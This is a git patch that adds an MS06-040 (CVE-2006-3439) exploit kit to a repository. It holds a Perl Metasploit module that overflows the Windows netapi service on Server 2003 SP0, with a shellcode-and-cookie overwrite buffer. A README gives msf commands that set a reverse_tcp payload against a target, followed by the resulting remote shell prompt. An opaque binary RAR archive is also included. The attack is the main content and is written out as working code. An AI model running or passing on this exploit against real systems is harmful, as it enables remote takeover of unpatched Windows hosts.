From 0a812140bfc36940629ed2b51176a3ebedc8f528 Mon Sep 17 00:00:00 2001 From: Gitmaninc Date: Mon, 15 May 2017 19:40:58 -0400 Subject: [PATCH] MS06-040 --- MS06-040/2355.pm | 233 +++++++++++++++++++++++++++++++++++++++++++ MS06-040/README.md | 32 ++++++ MS06-040/ms06040.rar | Bin 0 -> 15506 bytes 3 files changed, 265 insertions(+) create mode 100644 MS06-040/2355.pm create mode 100644 MS06-040/README.md create mode 100644 MS06-040/ms06040.rar diff --git a/MS06-040/2355.pm b/MS06-040/2355.pm new file mode 100644 index 0000000..f86183e --- /dev/null +++ b/MS06-040/2355.pm @@ -0,0 +1,233 @@ +######################################################################### +# netapi_win2003.pm (MS06-040 Exploit for Windows Server 2003 SP0) +# +# Author: Trirat Puttaraksa (Kira) +# +# http://sf-freedom.blogspot.com +# +# For educational purpose only +# +# Note: This exploit is developed because of my question "Is it exploitable +# on Windows Server 2003 platform ?". As I know, Windows XP SP2 and Windows +# Server 2003 SP1 is not exploitable because they are compiled with /GS, but +# how about Windows Server 2003 SP0 ? In metasploit netapi_ms06_040.pm there +# is no Windows Server 2003 sp0 target, this means 2003 SP0 is not +# exploitable ? There is Stack Protection Windows Server 2003, is this the +# reasons why there is no Windows Server 2003 SP0 exploit for MS06-040 ? +# +# I start to modify H D Moore's exploit (netapi_ms06_040.pm - credits to him +# ^-^) and work on it. The problem is the Stack Protection "security cookie +# checking". Because wcscpy() method allow me to write to any memory location +# that are marked writable, I decide to write to the location at "security +# cookie" is stored and it works !!! I will describe more implementation details +# in my blog in few days ^-^ +# +# This exploit tested on Windows Server 2003 SP0 build 3790 and successful +# exploit 2003 machine in my environment - all patch before MS06-040 +# (KB921883). It's quite reliable but not 100%. There is the possibility that +# the exploit will fail and the target system process crash. Because I have +# only one testbase system, I couldn't confirm this exploit will work on +# your environment. However feel free to e-mail to me. +# +# Credits: H D Moore +######################################################################### + +package Msf::Exploit::netapi_win2003; +use base "Msf::Exploit"; +use strict; + +use Pex::DCERPC; +use Pex::NDR; + +my $advanced = { + 'FragSize' => [ 256, 'The DCERPC fragment size' ], + 'BindEvasion' => [ 0, 'IDS Evasion of the bind request' ], + 'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ], + }; + +my $info = { + 'Name' => 'MSO6-040 Windows Server 2003 Target', + 'Version' => '', + 'Authors' => + [ + 'Trirat Puttaraksa (Kira) ', + ], + + 'Arch' => ['x86'], + 'OS' => [ 'win32', 'win2003' ], + 'Priv' => 1, + + 'AutoOpts' => { 'EXITFUNC' => 'thread' }, + + 'UserOpts' => + { + 'RHOST' => [ 1, 'ADDR', 'The target address' ], + + # SMB connection options + 'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ], + 'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ], + 'SMBDOM' => [ 0, 'DATA', 'The domain for specified SMB username', '' ], + }, + + 'Payload' => + { + # Technically we can use more space than this, but by limiting it + # to 370 bytes we can use the same request for all Windows SPs. + 'Space' => 370, + + 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", + 'Keys' => ['+ws2ord'], + + # sub esp, 4097 + inc esp makes stack happy + 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44", + }, + + 'Description' => Pex::Text::Freeform( + qq{ + This exploit modified from netapi_ms06_040.pm (Metasploit). + While netapi_ms06_040 of metasploit works on Windows 2000 + SP0 - SP4 and Windows XP SP0 - SP1, this exploit works on + Windows Server 2003 SP0. + } + ), + + 'Refs' => + [ + [ 'BID', '19409' ], + [ 'CVE', '2006-3439' ], + [ 'MSB', 'MS06-040' ], + ], + + 'DefaultTarget' => 0, + 'Targets' => + [ + [ '(wcscpy) Windows Server 2003 SP0', 612], + ], + + 'Keys' => ['srvsvc'], + + 'DisclosureDate' => '', + }; + +sub new { + my ($class) = @_; + my $self = + $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ ); + return ($self); +} + +sub Exploit { + my ($self) = @_; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $target_idx = $self->GetVar('TARGET'); + my $shellcode = $self->GetVar('EncodedPayload')->Payload; + my $target_name = '*SMBSERVER'; + + my $FragSize = $self->GetVar('FragSize') || 256; + my $target = $self->Targets->[$target_idx]; + + if (!$self->InitNops(128)) { + $self->PrintLine("Could not initialize the nop module"); + return; + } + + my ( $res, $rpc ); + + my $pipe = '\BROWSER'; + my $uuid = '4b324fc8-1670-01d3-1278-5a47bf6ee188'; + my $version = '3.0'; + + my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe ); + + my $dce = Pex::DCERPC->new( + 'handle' => $handle, + 'username' => $self->GetVar('SMBUSER'), + 'password' => $self->GetVar('SMBPASS'), + 'domain' => $self->GetVar('SMBDOM'), + 'fragsize' => $self->GetVar('FragSize'), + 'bindevasion' => $self->GetVar('BindEvasion'), + 'directsmb' => $self->GetVar('DirectSMB'), + ); + + if ( !$dce ) { + $self->PrintLine("[*] Could not bind to $handle"); + return; + } + + my $smb = $dce->{'_handles'}{$handle}{'connection'}; + + if (! $smb) { + $self->PrintLine("[*] Could not establish SMB session"); + return; + } + + my $stub; + + # + # Use the wcscpy() method on Windows Server 2003 SP0 + # + if ($target->[0] =~ /2003/) { + + my $path = + $shellcode. + + # Padding + Pex::Text::AlphaNumText($target->[1] - length($shellcode)). + Pex::Text::AlphaNumText(32). + substr($shellcode, 0, 4). # cookie + Pex::Text::AlphaNumText(4). + # return address == address that store security cookie + ("\xec\xc1\xc8\x71") . + Pex::Text::AlphaNumText(8). + + ("\xec\xc1\xc8\x71" x 2) . + Pex::Text::AlphaNumText(36). + + # Terminate + "\x00\x00"; + + + # Package that into a stub + $stub = + Pex::NDR::Long(int(rand(0xffffffff))). + Pex::NDR::UnicodeConformantVaryingString(''). + Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path). + Pex::NDR::Long(int(rand(250)+1)). + Pex::NDR::UnicodeConformantVaryingString(''). + Pex::NDR::Long(int(rand(250)+1)). + Pex::NDR::Long(0); + } + else { + $self->PrintLine("This target is not currently supported"); + return; + } + + + $self->PrintLine("[*] Sending request..."); + + # Function 0x1f is not the only way to exploit this :-) + my @response = $dce->request( $handle, 0x1f, $stub ); + + if ( length($dce->{'response'}->{'StubData'}) > 0) { + $self->PrintLine("[*] The server rejected it, trying again..."); + @response = $dce->request( $handle, 0x1f, $stub ); + } + + if ( length($dce->{'response'}->{'StubData'}) > 0) { + $self->PrintLine("[*] Exploit Failed"); + } + + if (@response) { + $self->PrintLine('[*] RPC server responded with:'); + foreach my $line (@response) { + $self->PrintLine( '[*] ' . $line ); + } + } + + return; +} + +1; + +# milw0rm.com [2006-09-13] diff --git a/MS06-040/README.md b/MS06-040/README.md new file mode 100644 index 0000000..1ad6346 --- /dev/null +++ b/MS06-040/README.md @@ -0,0 +1,32 @@ +# MS06-040 + +MS06-040 + +Vulnerability reference: + * [MS06-040](https://technet.microsoft.com/library/security/ms06-040) + * [CVE-2006-3439](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439) + * [exp-db](https://www.exploit-db.com/exploits/2355/) + +## msf Usage +* [YouTube-ms06-040](https://www.youtube.com/watch?v=AsZ8qTr7IoE) +``` +msf > search ms06_040 +msf > use exploit/windows/smb/ms06_040_netapi +msf exploit(ms06_040_netapi) > show payloads +msf exploit(ms06_040_netapi) > set payload windows/shell/reverse_tcp +msf exploit(ms06_040_netapi) > set RHOST 192.1.80.2 +msf exploit(ms06_040_netapi) > set LHOST 192.1.80.152 +msf exploit(ms06_040_netapi) > set TARGET 0TARGET -> 0 +msf exploit(ms06_040_netapi) > exploit +session -i 1 + +Microsoft Windows 2000 [Version 5.00.2195] +(C) 版权所有 1985-2000 Microsoft Corp. +C:\WINNT\system32> +``` + +## References +* [深入浅出MS06-040](http://blog.csdn.net/iiprogram/article/details/2820149) +* [How to Exploit MS06-040](https://www.linickx.com/how-to-exploit-ms06-040) + + diff --git a/MS06-040/ms06040.rar b/MS06-040/ms06040.rar new file mode 100644 index 0000000000000000000000000000000000000000..f7017c7466eabfdf51dcf9a508d69ff6ab54d566 GIT binary patch literal 15506 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 